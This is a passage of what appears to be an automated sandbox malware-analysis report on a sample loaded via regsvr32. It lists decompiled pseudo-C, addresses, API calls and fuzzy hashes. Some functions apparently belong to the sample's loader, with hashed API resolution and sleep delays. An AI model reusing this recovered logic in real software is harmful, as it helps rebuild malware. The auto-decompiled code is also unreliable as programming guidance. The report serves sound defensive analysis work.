                          					_t92 = _t88;
                          					if(_t88 != 0) {
                          						HeapFree();
                          						_t47 = _t164 + 0xc0; // 0xc0
                          						_t72 = E003D47B8(_t92, _t95, 0, _t134, _t137, _t47, _t168);
                          						L17:
                          						__eflags = _t72;
                          						if(_t72 == 0) {
                          							asm("lock or dword [edi+0xec], 0x1");
                          							_t166 = _v104;
                          						}
                          						L21:
                          						if( *((intOrPtr*)(_t164 + 0x60)) != 0) {
                          							E003D908C(_t72, 0x9c66d81c,  *((intOrPtr*)(_t192 + 0x18)));
                          							if(_t134 != 0) {
                          								 *_t134();
                          							}
                          							if(r15d != 0) {
                          								_t134 =  *(_t164 + 0x58);
                          								if(_v88 > _t134) {
                          									_t57 = _t164 + 0xc0; // 0xc1
                          									if(E003D47B8(_t92, _t95, 0, _t134, _t137, _t57, _t168) == 0) {
                          										asm("lock or dword [edi+0xec], 0x1");
                          										_t166 = _v104;
                          									}
                          								}
                          							}
                          							_t134 = _t134 * 0x23c34600 + _v88;
                          							 *(_t164 + 0x58) = _t134;
                          						}
                          						if(_t166 != 0) {
                          							_t74 = HeapFree();
                          							if(_t92 == 0 || _t92 == 0x10d2) {
                          								_t75 = E003D908C(_t74, 0x4a75e5e7,  *((intOrPtr*)(_t192 + 0x10)));
                          								if(_t134 != 0) {
                          									_t75 =  *_t134();
                          								}
                          								 *(_t164 + 0x98) =  *(_t164 + 0x98) & 0x00000000;
                          								 *(_t164 + 0x9c) =  *(_t164 + 0x9c) & 0x00000000;
                          								E003D908C(_t75, 0x8d72aad2,  *((intOrPtr*)(_t192 + 0x10)));
                          								if(_t134 != 0) {
                          									 *_t134();
                          								}
                          							}
                          						}
                          						return _t92;
                          					}
                          					_t134 = _a16;
                          					 *_t134 = _t188;
                          					_t72 = _a8;
                          					 *_a24 = _a8;
                          					if( *(_t164 + 0x4c) != r13d) {
                          						goto L21;
                          					}
                          					L20:
                          					r15d = 1;
                          					goto L21;
                          				}
                          			}




































                          0x003d2dc4
                          0x003d2dc4
                          0x003d2dc4
                          0x003d2dc4
                          0x003d2dc4
                          0x003d2dc7
                          0x003d2dcb
                          0x003d2dcf
                          0x003d2dd0
                          0x003d2dd1
                          0x003d2dd9
                          0x003d2ddf
                          0x003d2de6
                          0x003d2deb
                          0x003d2dee
                          0x003d2df4
                          0x003d2dfc
                          0x003d2e04
                          0x003d2e07
                          0x003d2e0e
                          0x003d2e1a
                          0x003d2e29
                          0x003d2e2e
                          0x003d2e1c
                          0x003d2e1c
                          0x003d2e1e
                          0x003d2e1e
                          0x003d2e22
                          0x003d2e22
                          0x003d2e34
                          0x003d2e34
                          0x003d2e3c
                          0x003d2e41
                          0x003d2e47
                          0x003d2e4c
                          0x003d2e50
                          0x003d2f94
                          0x003d2f94
                          0x003d2f9a
                          0x00000000
                          0x003d2fc2
                          0x003d2f9c
                          0x003d2fa3
                          0x003d2fa5
                          0x00000000
                          0x003d2e56
                          0x003d2e56
                          0x003d2e5e
                          0x003d2e61
                          0x003d2e64
                          0x003d2e6c
                          0x003d2e6e
                          0x003d2e75
                          0x003d2e7e
                          0x003d2e83
                          0x003d2e88
                          0x003d2e88
                          0x003d2e91
                          0x003d2e98
                          0x003d2ea0
                          0x003d2ea3
                          0x003d2eaa
                          0x003d2eb2
                          0x003d2eb7
                          0x003d2ebf
                          0x003d2ec4
                          0x003d2ec4
                          0x003d2ec9
                          0x003d2edd
                          0x003d2edf
                          0x003d2ee8
                          0x003d2efc
                          0x003d2efc
                          0x003d2f03
                          0x00000000
                          0x00000000
                          0x003d2f09
                          0x003d2f10
                          0x003d2f15
                          0x003d2f1e
                          0x003d2f23
                          0x003d2f2b
                          0x003d2f37
                          0x003d2f3a
                          0x003d2f3d
                          0x003d2f42
                          0x003d2f46
                          0x003d2f7e
                          0x003d2f84
                          0x003d2f8d
                          0x003d2faf
                          0x003d2faf
                          0x003d2fb1
                          0x003d2fb3
                          0x003d2fbb
                          0x003d2fbb
                          0x003d2fcd
                          0x003d2fd1
                          0x003d2fdc
                          0x003d2fe4
                          0x003d2feb
                          0x003d2feb
                          0x003d2ff0
                          0x003d2ff2
                          0x003d2ffb
                          0x003d2ffd
                          0x003d300d
                          0x003d300f
                          0x003d3017
                          0x003d3017
                          0x003d300d
                          0x003d2ffb
                          0x003d3026
                          0x003d302b
                          0x003d302b
                          0x003d3032
                          0x003d303c
                          0x003d3044
                          0x003d3057
                          0x003d305f
                          0x003d3065
                          0x003d3065
                          0x003d3067
                          0x003d306e
                          0x003d307e
                          0x003d3086
                          0x003d308c
                          0x003d308c
                          0x003d3086
                          0x003d3044
                          0x003d30a0
                          0x003d30a0
                          0x003d2f48
                          0x003d2f58
                          0x003d2f5b
                          0x003d2f67
                          0x003d2f6d
                          0x00000000
                          0x00000000
                          0x003d2fc7
                          0x003d2fc7
                          0x00000000
                          0x003d2fc7

                          APIs
                            • Part of subcall function 003D4320: HeapAlloc.KERNEL32 ref: 003D4381
                          • HeapFree.KERNEL32 ref: 003D2EDF
                          • HeapFree.KERNEL32 ref: 003D2F7E
                          • HeapFree.KERNEL32 ref: 003D303C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Free$Alloc
                          • String ID: uJ
                          • API String ID: 3901518246-2850656762
                          • Opcode ID: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction ID: adf70958b691cfa199f02b363432442a563e1998894cc6fcad0a4b2aa215e7b1
                          • Opcode Fuzzy Hash: e0b0127afc2e475f9b0db1383f047a2d59cc43cd89f7ddf17b2878a33f882b21
                          • Instruction Fuzzy Hash: D4717A33204B8097DB26DB22F584B9AB3A8F798B84F454427EF5A47B04DF39D965CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00007FF87FF88C0820A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                          				void* _t43;
                          				signed int _t52;
                          				void* _t53;
                          				void* _t61;
                          				signed int _t64;
                          				signed char _t66;
                          				signed char _t75;
                          				signed int _t76;
                          				void* _t100;
                          				signed int _t109;
                          
                          				_t75 = __edx;
                          				_a8 = __rbx;
                          				_a24 = __rbp;
                          				 *__rcx = 0;
                          				r14d = r9d;
                          				_t76 = __edx;
                          				if (__eflags == 0) goto 0x8c08211a;
                          				if (__eflags == 0) goto 0x8c0820f9;
                          				if ((__edx & 0x00000003) - 1 == 1) goto 0x8c0820f2;
                          				_t43 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t43);
                          				goto 0x8c08211f;
                          				goto 0x8c08211f;
                          				asm("sbb eax, eax");
                          				goto 0x8c08211f;
                          				__rcx[1] = 0x80000000;
                          				_t52 = _t76 & 0x00000700;
                          				if ((_t75 & 0x00000008) == 0) goto 0x8c08218b;
                          				if (_t52 == 0x100) goto 0x8c082184;
                          				if (_t52 == 0x200) goto 0x8c08217d;
                          				if (_t52 == 0x300) goto 0x8c082176;
                          				if (_t52 == 0x400) goto 0x8c08218b;
                          				if (_t52 == 0x500) goto 0x8c08216f;
                          				if (_t52 == 0x600) goto 0x8c08217d;
                          				_t100 = _t52 - 0x700;
                          				if (_t100 == 0) goto 0x8c08216f;
                          				_t53 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t53);
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				goto 0x8c082190;
                          				__rcx[2] = 3;
                          				if (_t100 == 0) goto 0x8c0821e2;
                          				if (_t100 == 0) goto 0x8c0821db;
                          				if (_t100 == 0) goto 0x8c0821d4;
                          				if (_t100 == 0) goto 0x8c0821cd;
                          				if (_t100 == 0) goto 0x8c0821be;
                          				_t61 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t61);
                          				goto 0x8c0821e4;
                          				sil = __rcx[1] == 0x80000000;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				goto 0x8c0821e4;
                          				__rcx[5] = __rcx[5] & 0x00000000;
                          				bpl = 0x80;
                          				__rcx[3] = 0;
                          				__rcx[4] = 0x80;
                          				if ((bpl & dil) == 0) goto 0x8c0821fd;
                          				 *__rcx =  *__rcx | 0x00000010;
                          				if ((0x00008000 & _t76) != 0) goto 0x8c082225;
                          				if ((_t76 & 0x00074000) != 0) goto 0x8c082222;
                          				if (E00007FF87FF88C084DDC(_t75, __rax,  &_a16) != 0) goto 0x8c08229b;
                          				if (_a16 == 0x8000) goto 0x8c082225;
                          				 *__rcx =  *__rcx | bpl;
                          				if ((0x00000100 & _t76) == 0) goto 0x8c082245;
                          				_t64 =  *0x8c0b4dd4; // 0x0
                          				_t66 =  !_t64 & r14d;
                          				if ((bpl & _t66) != 0) goto 0x8c082245;
                          				__rcx[4] = 1;
                          				_t109 = dil & 0x00000040;
                          				if (_t109 == 0) goto 0x8c082259;
                          				asm("bts dword [ebx+0x14], 0x1a");
                          				asm("bts dword [ebx+0x4], 0x10");
                          				__rcx[3] = __rcx[3] | 0x00000004;
                          				asm("bt edi, 0xc");
                          				if (_t109 >= 0) goto 0x8c082262;
                          				__rcx[4] = __rcx[4] | 0x00000100;
                          				asm("bt edi, 0xd");
                          				if (_t109 >= 0) goto 0x8c08226d;
                          				asm("bts dword [ebx+0x14], 0x19");
                          				if ((dil & 0x00000020) == 0) goto 0x8c08227a;
                          				asm("bts dword [ebx+0x14], 0x1b");
                          				goto 0x8c082285;
                          				if ((dil & 0x00000010) == 0) goto 0x8c082285;
                          				asm("bts dword [ebx+0x14], 0x1c");
                          				return _t66;
                          			}













                          0x7ff88c0820a8
                          0x7ff88c0820a8
                          0x7ff88c0820ad
                          0x7ff88c0820bd
                          0x7ff88c0820c2
                          0x7ff88c0820c8
                          0x7ff88c0820d2
                          0x7ff88c0820d7
                          0x7ff88c0820dc
                          0x7ff88c0820de
                          0x7ff88c0820e3
                          0x7ff88c0820e9
                          0x7ff88c0820f0
                          0x7ff88c0820f7
                          0x7ff88c08210c
                          0x7ff88c082118
                          0x7ff88c08211f
                          0x7ff88c082129
                          0x7ff88c08212b
                          0x7ff88c082132
                          0x7ff88c082139
                          0x7ff88c082140
                          0x7ff88c082147
                          0x7ff88c08214e
                          0x7ff88c082155
                          0x7ff88c082157
                          0x7ff88c082159
                          0x7ff88c08215b
                          0x7ff88c082160
                          0x7ff88c082166
                          0x7ff88c08216d
                          0x7ff88c082174
                          0x7ff88c08217b
                          0x7ff88c082182
                          0x7ff88c082189
                          0x7ff88c082190
                          0x7ff88c082196
                          0x7ff88c08219b
                          0x7ff88c0821a0
                          0x7ff88c0821a5
                          0x7ff88c0821aa
                          0x7ff88c0821ac
                          0x7ff88c0821b1
                          0x7ff88c0821b7
                          0x7ff88c0821bc
                          0x7ff88c0821c7
                          0x7ff88c0821cb
                          0x7ff88c0821d2
                          0x7ff88c0821d9
                          0x7ff88c0821e0
                          0x7ff88c0821e4
                          0x7ff88c0821e8
                          0x7ff88c0821eb
                          0x7ff88c0821ee
                          0x7ff88c0821f8
                          0x7ff88c0821fa
                          0x7ff88c082204
                          0x7ff88c08220c
                          0x7ff88c08221a
                          0x7ff88c082220
                          0x7ff88c082222
                          0x7ff88c08222c
                          0x7ff88c08222e
                          0x7ff88c082236
                          0x7ff88c08223c
                          0x7ff88c08223e
                          0x7ff88c082245
                          0x7ff88c082249
                          0x7ff88c08224b
                          0x7ff88c082250
                          0x7ff88c082255
                          0x7ff88c082259
                          0x7ff88c08225d
                          0x7ff88c08225f
                          0x7ff88c082262
                          0x7ff88c082266
                          0x7ff88c082268
                          0x7ff88c082271
                          0x7ff88c082273
                          0x7ff88c082278
                          0x7ff88c08227e
                          0x7ff88c082280
                          0x7ff88c08229a

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo$_get_daylight
                          • String ID:
                          • API String ID: 72036449-0
                          • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction ID: 5df47e6e18ebaebc7e9b1d1f469532fd3cdc8f02e1f9d61042ffd119752d8ec2
                          • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                          • Instruction Fuzzy Hash: 03518F22D0C20686FF79592ADD0537A6AC0FB62BD5F29C435DB09862DEDF3DE940C681
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00007FF87FF88C07F0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                          				void* _t4;
                          				void* _t9;
                          				intOrPtr _t11;
                          				intOrPtr _t14;
                          				void* _t23;
                          				void* _t29;
                          				void* _t32;
                          				void* _t33;
                          
                          				_t29 = __rdx;
                          				_t27 = __rcx;
                          				_t25 = __rbx;
                          				_t23 = __rax;
                          				_a8 = __rbx;
                          				GetLastError();
                          				_t11 =  *0x8c0b3888; // 0x7
                          				if (_t11 == 0xffffffff) goto 0x8c07f0fe;
                          				_t4 = E00007FF87FF88C07F5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                          				if (__rax != 0) goto 0x8c07f13f;
                          				E00007FF87FF88C07E26C(_t4, _t27, _t29);
                          				_t32 = _t23;
                          				if (_t23 != 0) goto 0x8c07f11e;
                          				E00007FF87FF88C07E114(_t23, _t27);
                          				goto 0x8c07f15a;
                          				_t14 =  *0x8c0b3888; // 0x7
                          				if (E00007FF87FF88C07F614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x8c07f117;
                          				E00007FF87FF88C07EE40(_t32, _t23);
                          				_t9 = E00007FF87FF88C07E114(_t23, _t32);
                          				if (_t32 == 0) goto 0x8c07f15a;
                          				SetLastError(??);
                          				return _t9;
                          			}











                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0d4
                          0x7ff88c07f0de
                          0x7ff88c07f0e4
                          0x7ff88c07f0ef
                          0x7ff88c07f0f1
                          0x7ff88c07f0fc
                          0x7ff88c07f108
                          0x7ff88c07f10d
                          0x7ff88c07f113
                          0x7ff88c07f117
                          0x7ff88c07f11c
                          0x7ff88c07f11e
                          0x7ff88c07f131
                          0x7ff88c07f133
                          0x7ff88c07f13a
                          0x7ff88c07f142
                          0x7ff88c07f146
                          0x7ff88c07f159

                          APIs
                          • GetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F0DE
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F146
                          • SetLastError.KERNEL32(?,?,?,00007FF88C080459,?,?,?,?,?,?,?,00007FF88C080611), ref: 00007FF88C07F15C
                          • abort.LIBCMT ref: 00007FF88C07F162
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: ErrorLast$abort
                          • String ID:
                          • API String ID: 1447195878-0
                          • Opcode ID: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                          • Instruction ID: 6852cd3203e04baf55969b6dae345be4d4fe10664b6a2c96994eea04db491ba5
                          • Opcode Fuzzy Hash: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                          • Instruction Fuzzy Hash: 75015220B0A34A46FE5C6770E55A1382191BF66FD0F140438EA2E037DEEF2EF845C611
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 52%
                          			E00007FF87FF88C07D734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                          				long long _v56;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t27;
                          				intOrPtr _t36;
                          				intOrPtr* _t62;
                          				long long _t68;
                          				void* _t70;
                          				long long _t84;
                          				signed int _t85;
                          				intOrPtr* _t86;
                          				void* _t89;
                          
                          				_t70 = __rcx;
                          				_a8 = __rbx;
                          				_t2 = _t70 - 1; // -1
                          				r14d = __ecx;
                          				if (_t2 - 1 <= 0) goto 0x8c07d768;
                          				_t27 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t27);
                          				goto 0x8c07d897;
                          				E00007FF87FF88C0805F8();
                          				r8d = 0x104;
                          				GetModuleFileNameA(??, ??, ??);
                          				_t86 =  *0x8c0b4950; // 0x6332a0
                          				 *0x8c0b4960 = 0x8c0b43e0;
                          				if (_t86 == 0) goto 0x8c07d79f;
                          				if ( *_t86 != dil) goto 0x8c07d7a2;
                          				_t62 =  &_a32;
                          				_a24 = _t85;
                          				_v56 = _t62;
                          				r8d = 0;
                          				_a32 = _t85;
                          				E00007FF87FF88C07D514(0x8c0b43e0, 0x8c0b43e0, 0x8c0b43e0, _t85, 0x8c0b43e0, _t89, __r8,  &_a24);
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_a24, _a32, __r8);
                          				_t68 = _t62;
                          				if (_t62 != 0) goto 0x8c07d7f3;
                          				E00007FF87FF88C07E6A0(_t62);
                          				_t10 = _t68 + 0xc; // 0xc
                          				 *_t62 = _t10;
                          				goto 0x8c07d892;
                          				_v56 =  &_a32;
                          				E00007FF87FF88C07D514(_t68, 0x8c0b43e0, _t68, _t85, 0x8c0b43e0, _t89, _t62 + _a24 * 8,  &_a24);
                          				if (r14d != 1) goto 0x8c07d829;
                          				_t36 = _a24 - 1;
                          				 *0x8c0b4940 = _t68;
                          				 *0x8c0b493c = _t36;
                          				goto 0x8c07d7ec;
                          				_a16 = _t85;
                          				0x8c07fef4();
                          				if (_t36 == 0) goto 0x8c07d858;
                          				E00007FF87FF88C07E114( &_a32, _a16);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114( &_a32, _t68);
                          				goto 0x8c07d897;
                          				_t84 = _a16;
                          				if ( *_t84 == _t85) goto 0x8c07d873;
                          				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x8c07d867;
                          				 *0x8c0b493c = 0;
                          				_a16 = _t85;
                          				 *0x8c0b4940 = _t84;
                          				E00007FF87FF88C07E114(_t84 + 8, _t85 + 1);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114(_t84 + 8, _t68);
                          				return _t36;
                          			}
















                          0x7ff88c07d734
                          0x7ff88c07d734
                          0x7ff88c07d747
                          0x7ff88c07d74a
                          0x7ff88c07d750
                          0x7ff88c07d752
                          0x7ff88c07d75c
                          0x7ff88c07d75e
                          0x7ff88c07d763
                          0x7ff88c07d768
                          0x7ff88c07d774
                          0x7ff88c07d77f
                          0x7ff88c07d785
                          0x7ff88c07d78e
                          0x7ff88c07d798
                          0x7ff88c07d79d
                          0x7ff88c07d7a2
                          0x7ff88c07d7a6
                          0x7ff88c07d7ae
                          0x7ff88c07d7b3
                          0x7ff88c07d7b6
                          0x7ff88c07d7bf
                          0x7ff88c07d7c8
                          0x7ff88c07d7d5
                          0x7ff88c07d7da
                          0x7ff88c07d7e0
                          0x7ff88c07d7e2
                          0x7ff88c07d7e7
                          0x7ff88c07d7ea
                          0x7ff88c07d7ee
                          0x7ff88c07d805
                          0x7ff88c07d80a
                          0x7ff88c07d813
                          0x7ff88c07d818
                          0x7ff88c07d81a
                          0x7ff88c07d821
                          0x7ff88c07d827
                          0x7ff88c07d82d
                          0x7ff88c07d834
                          0x7ff88c07d83d
                          0x7ff88c07d843
                          0x7ff88c07d84b
                          0x7ff88c07d84f
                          0x7ff88c07d856
                          0x7ff88c07d858
                          0x7ff88c07d865
                          0x7ff88c07d871
                          0x7ff88c07d873
                          0x7ff88c07d87b
                          0x7ff88c07d87f
                          0x7ff88c07d886
                          0x7ff88c07d88e
                          0x7ff88c07d892
                          0x7ff88c07d8a9

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Windows\system32\regsvr32.exe
                          • API String ID: 3307058713-464481000
                          • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction ID: 984c6c71b5a5e1382077036644576bf3a30590c0c01921f22234c157db7f73b2
                          • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction Fuzzy Hash: F841AE32A09B5A8AEF58DF26E8400B867A4FF56BD4F544031EA4D07B49EF3EE541C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID: @
                          • API String ID: 3000768030-2766056989
                          • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction ID: 272737084f694f5981accc06e7611bf55abec3b8f15265785a7cfa3449f673c9
                          • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction Fuzzy Hash: C4212D62A18B4241EF748B2AE8901392691FB47BF8F345335D6AE077DCCF29E881D241
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID:
                          • API String ID: 2332451156-0
                          • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction ID: 502f55add1e66d7fabdbfdd30fc2f304d4c8541ec69960f372e996c9406592c3
                          • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                          • Instruction Fuzzy Hash: 17213422211B50C1EB16EB66FA4036D63A9EBC9FC4F5994179E0E6B769CF38C981C300
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 21dd9335638-21dd9335687 call 21dd933908c 3 21dd9335691-21dd93356a2 call 21dd933908c 0->3 4 21dd9335689-21dd933568f SleepEx 0->4 7 21dd93356a4 3->7 8 21dd93356ab-21dd93356eb call 21dd9335ba4 call 21dd93313ec 3->8 4->3 7->8 13 21dd93359e0-21dd93359f9 8->13 14 21dd93356f1-21dd9335706 call 21dd933908c 8->14 17 21dd9335711 14->17 18 21dd9335708-21dd933570f 14->18 19 21dd9335713-21dd9335722 call 21dd933908c 17->19 18->19 23 21dd933572e 19->23 24 21dd9335724-21dd933572c 19->24 25 21dd9335731-21dd9335747 HeapAlloc 23->25 24->25 27 21dd933574d-21dd933576b call 21dd93347b0 25->27 28 21dd93359d2-21dd93359da HeapFree 25->28 31 21dd933576d-21dd9335774 27->31 32 21dd93357a3-21dd93357b3 call 21dd933a238 27->32 28->13 31->32 33 21dd9335776-21dd933579e call 21dd93347b0 * 2 31->33 36 21dd93357b8-21dd93357ba 32->36 33->32 37 21dd93357c0-21dd93357e1 call 21dd933908c 36->37 38 21dd93359c4-21dd93359cc HeapFree 36->38 43 21dd93357e3-21dd93357e8 37->43 44 21dd93357ea 37->44 38->28 45 21dd93357ec-21dd933580b HeapAlloc 43->45 44->45 47 21dd9335811-21dd933584c call 21dd9335ba4 call 21dd93313ec 45->47 48 21dd93359b6 45->48 54 21dd9335852-21dd9335893 call 21dd933b158 HeapFree 47->54 55 21dd93359a8-21dd93359b0 HeapFree 47->55 49 21dd93359b9-21dd93359be HeapFree 48->49 49->38 58 21dd93359fa-21dd93359ff 54->58 59 21dd9335899-21dd93358a2 54->59 55->48 58->38 59->58 60 21dd93358a8-21dd93358c7 call 21dd9337cf4 59->60 60->55 63 21dd93358cd-21dd93358ee HeapAlloc 60->63 64 21dd93358f4-21dd9335931 call 21dd9335ba4 call 21dd93313ec 63->64 65 21dd93359a3 63->65 70 21dd9335933-21dd9335993 call 21dd933b158 * 2 64->70 71 21dd9335995-21dd933599d HeapFree 64->71 65->55 70->49 71->65
                          C-Code - Quality: 17%
                          			E0000021D21DD9335638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                          				void* __rbp;
                          				signed long long _t89;
                          				void* _t104;
                          				signed long long _t109;
                          				signed long long _t122;
                          				signed long long _t131;
                          				intOrPtr _t141;
                          				void* _t167;
                          				void* _t186;
                          				long long* _t187;
                          				long long _t188;
                          				long long _t190;
                          				long long _t192;
                          				long long* _t193;
                          				long long* _t234;
                          				void* _t237;
                          				long _t240;
                          				long _t243;
                          				void* _t248;
                          				void* _t249;
                          				void* _t264;
                          				void* _t269;
                          				long _t270;
                          				long _t273;
                          				void* _t277;
                          				long _t281;
                          
                          				_t269 = __r11;
                          				_t192 = __rbx;
                          				_t186 = _t248;
                          				 *((long long*)(_t186 + 0x10)) = __rbx;
                          				 *((intOrPtr*)(_t186 + 0x20)) = r9d;
                          				 *((long long*)(_t186 + 0x18)) = __r8;
                          				 *((long long*)(_t186 + 8)) = __rcx;
                          				_t249 = _t248 - 0x50;
                          				_t244 =  *0xd933d458;
                          				_t187 =  *0xd933d448;
                          				 *((long long*)(_t249 + 0x38)) = _t187;
                          				E0000021D21DD933908C(0x38e683e4, _t187,  *((intOrPtr*)( *0xd933d458 + 0x18)));
                          				if (_t187 == _t237) goto 0xd9335691;
                          				_t9 = _t237 + 0xa; // 0xa, executed
                          				SleepEx(_t281); // executed
                          				E0000021D21DD933908C(0x9c66d81c, _t187,  *((intOrPtr*)( *0xd933d458 + 0x18)));
